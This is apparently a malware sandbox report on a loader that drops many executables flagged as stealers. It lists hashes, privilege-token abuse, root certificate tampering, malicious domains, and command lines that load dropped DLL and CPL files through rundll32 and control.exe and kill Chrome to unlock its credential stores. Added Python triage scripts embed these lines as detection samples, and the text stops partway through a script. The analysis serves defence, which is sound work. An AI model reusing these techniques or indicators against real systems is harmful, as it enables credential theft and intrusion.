SHA256 3c57830974bf9c9228e102599aefdcf40aca3615f69208652eec3c4495eeafc9
SHA512 e41fea6b2b4c207ed4f6c06723cada2f316a0ba72e902ad41c725fdb0e118012ccfec5da2ec3a032a8a42c379dac8056d37da1cb70b3d024a36b4860459100bc

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

MD5 5a940f37dbd4b2a11cbad4e6d2894362
SHA1 be6de46fbdfdbaf55ce4a8b019ec6a977451a383
SHA256 64c3ba6d9901d646fca4c4a6abe61d0600d2fae72e022866a58a5da8ba491681
SHA512 ee9fa303fc03a47627f0336d00a534949e24d74908bc69f1064e6f53579ef3170b5821e4149c1c7b355c992192e66269cb0dc903ea475079ae4554f068dafc15

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

MD5 253d21cd11dd8ad4830fa5e523754b4d
SHA1 66b0e2e1978186cec8ed9b997dca2e7689c315f7
SHA256 3a186d2cb0f5c7313ce70335bf022a8ad0d5f2a0c78afdc803bae5805b7c6e70
SHA512 6f3e9e59fbf1d60cc686c4f7cfce2ffd1907027d434e0ea325b6542b5fb00c99272c4efb7cf72085b2ca771199fe42e178824e63a3d8f491e5fefaebd07de8c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 f1b80f8bf26ca5f71aa5b2b6bfa7e1db
SHA1 166a7367dd455262c1ff30f4ed244a8334af5641
SHA256 77cfcc9edddd5e583f868ca7b34d5ecbf25076b71963638edb513cd2457c84c1
SHA512 bb324306a9fc9b56998634a3f0a64b520aa5f899e160add5b694b93b4feaa43430806811cf8620d37777132efedf0840fb641944b57839b2bedf6ccf886f3cf1

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

MD5 258b1f4b9b3e8238c677756c45b227dd
SHA1 bc4de5d2c5cd99d68dab277a46e8f2b77f9dace4
SHA256 cad945acf0a184ccbaba2f75e76ddd7f7b233845600aeb5830288f2a1f43357b
SHA512 33af399ce66e09162c1c35b9fd9f7fae423c9280d42d340effdb093d0c9a1c25f4c0fdd5170cdc7eb32db52eae7b5eb8280b139222c0607f137588bd3d6cb709

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 97877d179f6759884d4dbd9be7012ca6
SHA1 6dc574b08ce281cc54b0a5a306aa7bf271d17324
SHA256 80d05f0697a9c04f7c02d89f3ce75462ea455a0cfa9b0720e182f1aad8db655b
SHA512 7f1a91bf5f984eeef80667fd5f0ad67a7c45b91ad8f59631256bdabe0139f7cb205f786ee7352741ad946d3773acf103357d2ca4ae17b3d8b29ba6311bb975d3

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

MD5 2f2a49d381d18358d7a34aaf8dc50b2e
SHA1 051ae304b8e4bc64078d9d4a788f6580f79cfe2c
SHA256 84bc10f1bffe5ea780dcdb912a71561d5df68553467ef4ee79224e6bca281567
SHA512 f7561e9625d88c8d01e924fbd8e9bee1a8e43b9b99ffaafb28c2fc707fd59cce1ec84ea79218f7577294dd0bfac161a23e948a66e06569b8b2863cce8c61b910

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

MD5 1108c7f8925586a62a3ce9972afb0c97
SHA1 2002d5a140c853ff6b16de5f25431771175f948e
SHA256 8dd5136b976d4fdfa0b1ff685f78806123f1bcf781fc2e39904f0530bc11112d
SHA512 0182c633085afa12e7a416b212bb468372a4bed54b4d4a559cb69c718c42fd4afe88c7af8c0f0357dcfa1fbdba59da9e5c05c7cb73bca3debd11c86a171c994c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 378c2f34d06a9bd9559c6723100d9bd2
SHA1 5f8482b7334a08a64f8038ccd2922aa00b88ef12
SHA256 1b2d12bf86b519590b7cd63490c6eeace90304ecc3cf3b24262e2dd01b636543
SHA512 8d55c5ec456488775ddcc64f29ad51b5bbe7e1c7f7bbb1cf135e498f0e13e7483bd2599f4631ae1f2e80ee2b3da99f7b6319fe3560e4511d106644e86e337f14

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-25 05:16

Reported

2022-07-25 05:19

Platform

win7-20220718-en

Max time kernel

4s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

Signatures

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 34.64.183.91 N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

NSIS installer

installer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 C:\Users\Admin\AppData\Local\Temp\mali.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 1420 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe 4
PID 1420 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe 4
PID 1420 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe 4
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe 7
PID 1968 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe 4
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe 7
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe 7
PID 1420 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe 4
PID 1420 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe 4
PID 1420 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe 4
PID 1420 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe 4
PID 1420 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe 4

Count is the number of identical rows in the original listing (one row per WriteProcessMemory call); rows are kept in order of first appearance.
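
The sandbox emits one row per WriteProcessMemory call, so every child of the loader (PID 1420) appears several times, and a few children (setup.exe, askinstall63.exe, Routes Installation.exe) received more writes than the rest. The one row that is not loader-to-child is mali.exe (1968) writing into a second mali.exe (1708), which the Processes list below shows relaunched with -a. The script that follows is an added example, not sandbox logic: it collapses rows of this format into one entry per parent/child pair with a count, rebuilds the parent-to-child tree, and flags pairs whose write count exceeds the modal count for the run and pairs where a process writes into a child running its own image. The sample rows are copied from the table (a subset, with their original multiplicity); the two heuristics are assumptions of the example.

```python
import re
from collections import Counter, defaultdict

# One sandbox row per WriteProcessMemory call:
#   PID <src> wrote to memory of <dst> N/A <src image> <dst image>
# Image paths may contain spaces ("Routes Installation.exe"), so the first path is
# matched lazily up to the first ".exe " and the second greedily to end of line.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S.*?\.exe) (\S.*\.exe)$")

def collapse_writes(rows):
    """(src_pid, dst_pid, src_image, dst_image) -> number of identical rows,
    in order of first appearance. Rows that do not match the format are ignored."""
    counts = Counter()
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            src, dst, src_img, dst_img = m.groups()
            counts[(int(src), int(dst), src_img, dst_img)] += 1
    return counts

def injection_tree(counts):
    """src_pid -> [(dst_pid, dst_image, write_count), ...]"""
    tree = defaultdict(list)
    for (src, dst, _src_img, dst_img), n in counts.items():
        tree[src].append((dst, dst_img, n))
    return dict(tree)

def modal_count(counts):
    """Most common per-child write count; in this run it is what plain process
    creation produced for most children, so it serves as the baseline."""
    return Counter(counts.values()).most_common(1)[0][0]

def above_baseline(counts):
    """Parent/child pairs that received more writes than the modal count (heuristic)."""
    base = modal_count(counts)
    return [(src, dst, dst_img, n)
            for (src, dst, _s, dst_img), n in counts.items() if n > base]

def same_image_writes(counts):
    """A process writing into a child that runs the same image: seen with
    self-relaunching unpackers and process hollowing, so worth a manual look."""
    out = []
    for (src, dst, src_img, dst_img), n in counts.items():
        if src_img.rsplit("\\", 1)[-1].lower() == dst_img.rsplit("\\", 1)[-1].lower():
            out.append((src, dst, dst_img, n))
    return out

# Sample rows copied from the table above (a subset, each repeated as in the report).
T = r"C:\Users\Admin\AppData\Local\Temp"
ROOT = T + r"\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"
MALI = T + r"\mali.exe"
SAMPLE = (
    [f"PID 1420 wrote to memory of 1660 N/A {ROOT} {T}\\LightCleaner2352312.exe"] * 4
    + [f"PID 1420 wrote to memory of 1692 N/A {ROOT} {T}\\setup.exe"] * 7
    + [f"PID 1968 wrote to memory of 1708 N/A {MALI} {MALI}"] * 4
    + [f"PID 1420 wrote to memory of 1196 N/A {ROOT} {T}\\Routes Installation.exe"] * 7
    + [f"PID 1420 wrote to memory of 864 N/A {ROOT} {T}\\search_hyperfs_213.exe"] * 4
)

if __name__ == "__main__":
    counts = collapse_writes(SAMPLE)
    for src, children in injection_tree(counts).items():
        for dst, img, n in children:
            print(f"{src} -> {dst} {img} (x{n})")
    print("above baseline:", above_baseline(counts))
    print("same image:", same_image_writes(counts))
```

The modal baseline is only meaningful within one run: a different loader, or a 64-bit parent, produces a different number of startup writes per child, so compare within the trace rather than against a fixed number.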

Processes

C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

"C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe" -a

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

"C:\Users\Admin\AppData\Local\Temp\anytime8.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe

"C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe"
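
Several of the command lines above carry the signal on their own. control.exe and "rundll32.exe Shell32.dll,Control_RunDLL" both load OGgy.cPl from the user's Temp directory; a .cpl is a DLL with a CPlApplet export, so this runs the dropped code inside two Microsoft-signed host binaries. db.dll is loaded from Temp by both the 64-bit and the 32-bit rundll32.exe. svchost.exe is started with -k SystemNetworkService, which is not one of the group names a stock Windows install defines under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, so check that key on the affected host. "cmd.exe /c taskkill /f /im chrome.exe", read together with the "Reads user/profile data of web browsers" signature, is consistent with killing the browser to release the locks on its credential and cookie databases. The SysWOW64\control.exe image path beside a System32 command line is file-system redirection for a 32-bit parent, not a finding. The script below is an added example, not part of the report: it encodes those observations as command-line triage rules and runs them over lines copied from this list. The svchost group set is a partial, assumed baseline; a production rule should read the groups from the registry key named above.

```python
import re

# Locations a standard user can write to. A DLL, CPL or EXE loaded from one of
# these by a Windows-signed host binary deserves a look.
USER_WRITABLE_LIB = re.compile(
    r'[A-Za-z]:\\(?:Users\\[^\\"]+\\AppData|ProgramData|Windows\\Temp)\\[^"]*?\.(dll|cpl)\b',
    re.I)
USER_WRITABLE_EXE = re.compile(
    r'[A-Za-z]:\\(?:Users\\[^\\"]+\\AppData|ProgramData|Windows\\Temp)\\[^"]*?\.exe\b',
    re.I)
# Assumed, partial baseline of svchost -k groups. A real rule reads the group names
# from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost on the host.
KNOWN_SVCHOST_GROUPS = {
    "dcomlaunch", "rpcss", "netsvcs", "localservice", "networkservice",
    "localsystemnetworkrestricted", "localservicenetworkrestricted",
    "localservicenonetwork", "networkservicenetworkrestricted",
    "localserviceandnoimpersonation", "termsvcs", "wsappx", "unistacksvcgroup",
}
BROWSER_KILL = re.compile(r"taskkill\b.*?/im\s+(chrome|msedge|firefox|opera|brave)\.exe", re.I)
SVCHOST_GROUP = re.compile(r"\s-k\s+(\S+)", re.I)

def image_path(cmdline):
    """The program token a command line starts with, unquoted."""
    s = cmdline.strip()
    return s[1:].split('"', 1)[0] if s.startswith('"') else s.split(None, 1)[0]

def image_name(cmdline):
    """Lower-cased basename of that program, normalised to end in .exe."""
    base = image_path(cmdline).rsplit("\\", 1)[-1].lower()
    return base if base.endswith(".exe") else base + ".exe"

def triage(cmdline):
    """Return the list of rule names the command line trips (empty if none)."""
    tags = []
    base = image_name(cmdline)
    libs = [ext.lower() for ext in USER_WRITABLE_LIB.findall(cmdline)]
    if "cpl" in libs and base in ("control.exe", "rundll32.exe"):
        tags.append("cpl_from_user_path")        # Control_RunDLL loading a Temp .cpl
    if "dll" in libs and base == "rundll32.exe":
        tags.append("rundll32_user_path_dll")    # rundll32 <Temp>\x.dll,<export>
    if base == "svchost.exe":
        m = SVCHOST_GROUP.search(cmdline)
        if m and m.group(1).lower() not in KNOWN_SVCHOST_GROUPS:
            tags.append("svchost_unknown_group")  # -k group not defined on the host
    if BROWSER_KILL.search(cmdline):
        tags.append("browser_kill")              # frees locks on browser profile DBs
    if USER_WRITABLE_EXE.search(image_path(cmdline)):
        tags.append("exec_from_temp")
    return tags

# Command lines copied from the process list above, plus one benign svchost line for contrast.
SAMPLE = [
    r'"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",',
    r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",',
    r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global',
    r'C:\Windows\system32\svchost.exe -k SystemNetworkService',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'taskkill /f /im chrome.exe',
    r'"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"',
    r'C:\Windows\system32\svchost.exe -k netsvcs',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line) or "-", line)
```

The rules key on the user-writable path rather than on file names, because OGgy.cPl and db.dll are throwaway names while the Temp-directory load through a signed host binary is the part that repeats across samples.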

Network

Country Destination Domain Proto Count
US 8.8.8.8:53 v.xyzgamev.com udp 1
US 104.21.40.196:443 v.xyzgamev.com tcp 1
US 8.8.8.8:53 appwebstat.biz udp 1
US 8.8.8.8:53 apps.identrust.com udp 1
NL 104.110.191.182:80 apps.identrust.com tcp 1
US 8.8.8.8:53 www.listincode.com udp 1
US 103.224.182.208:443 www.listincode.com tcp 1
US 8.8.8.8:53 ads-memory.biz udp 1
US 216.239.32.178:80 www.google-analytics.com tcp 2
US 8.8.8.8:53 files.fastbestapp.com udp 1
US 172.67.192.181:443 files.fastbestapp.com tcp 1
US 8.8.8.8:53 iplogger.org udp 1
DE 148.251.234.83:443 iplogger.org tcp 188
US 8.8.8.8:53 toa.mygametoa.com udp 2
KR 34.64.183.91:53 toa.mygametoa.com udp 1
US 8.8.8.8:53 ip-api.com udp 1
US 208.95.112.1:80 ip-api.com tcp 1
US 8.8.8.8:53 pp.abcgameabc.com udp 1
US 104.21.34.132:443 pp.abcgameabc.com tcp 3
US 8.8.8.8:53 www.microsoft.com udp 1
US 8.8.8.8:53 x2.c.lencr.org udp 1
NL 23.2.164.159:80 x2.c.lencr.org tcp 1
US 8.8.8.8:53 e1.o.lencr.org udp 1
NL 104.110.191.185:80 e1.o.lencr.org tcp 1

Count is the number of identical rows in the original capture (215 rows in all, one per flow or DNS query), listed in order of first appearance.

The query to 34.64.183.91:53 for toa.mygametoa.com is the only DNS traffic that did not go to the sandbox resolver (8.8.8.8); this is the "Unexpected DNS network traffic destination" signature in the summary. A hard-coded resolver sidesteps the local DNS logging and filtering a defender relies on, so the destination address is worth an indicator of its own.

apps.identrust.com, x2.c.lencr.org and e1.o.lencr.org are the IdenTrust and Let's Encrypt CRL and OCSP endpoints that Windows contacts while validating the certificates of the HTTPS hosts above. They are side effects of the TLS connections, not malware infrastructure, and do not belong on a blocklist.

148.251.234.83 (iplogger.org, 188 TLS connections over the run) and 208.95.112.1 (ip-api.com) are public IP-logging and geolocation services, matching the "Looks up external IP address via web service" and "Looks up geolocation information via web service" signatures. They record the victim's check-in rather than carry command and control.

104.21.x.x and 172.67.x.x are Cloudflare-proxied addresses shared with many unrelated sites, so v.xyzgamev.com, files.fastbestapp.com and pp.abcgameabc.com should be blocked by name, not by IP.
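
As an added example (not part of the report), the script below takes rows in the Country/Destination/Domain/Proto format of this table, collapses repeats into counts, pulls out DNS queries that went anywhere other than the sandbox resolver, and sorts the remaining endpoints into the buckets a responder has to separate before turning the table into indicators: IP-lookup services, certificate-revocation endpoints that Windows contacts on its own during TLS validation, analytics, and everything else. The sample rows are a subset copied from the table, with iplogger.org repeated to stand in for its 188 connections; the bucket lists are assumptions seeded from the domains on this page and should be extended for your own environment.

```python
import re
from collections import Counter

# One row per captured flow or DNS query, as printed in the report:
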